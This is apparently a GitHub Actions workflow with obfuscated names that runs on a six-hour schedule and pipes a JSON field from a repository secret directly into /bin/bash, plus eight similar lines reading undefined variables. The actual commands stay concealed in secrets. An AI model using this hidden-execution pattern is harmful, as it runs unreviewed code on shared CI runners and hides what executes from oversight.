name: lingjigou6351
on:
  workflow_dispatch:
  schedule:
    - cron: '12 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lingjigou6351
        env:
          ampim9: ${{ secrets.ampim9 }}
        run: |
          echo $ampim9 | jq -r .hoew433 | /bin/bash
          echo $u57 | jq -r .cz9642 | /bin/bash
          echo $l48730 | jq -r .eios4810 | /bin/bash
          echo $drpsa396 | jq -r .u06 | /bin/bash
          echo $cj94 | jq -r .j19 | /bin/bash
          echo $dwaz8 | jq -r .ys0 | /bin/bash
          echo $ibhlf26 | jq -r .ri7 | /bin/bash
          echo $hfa8468 | jq -r .bu671 | /bin/bash
          echo $zxctu47 | jq -r .xvgql61 | /bin/bash

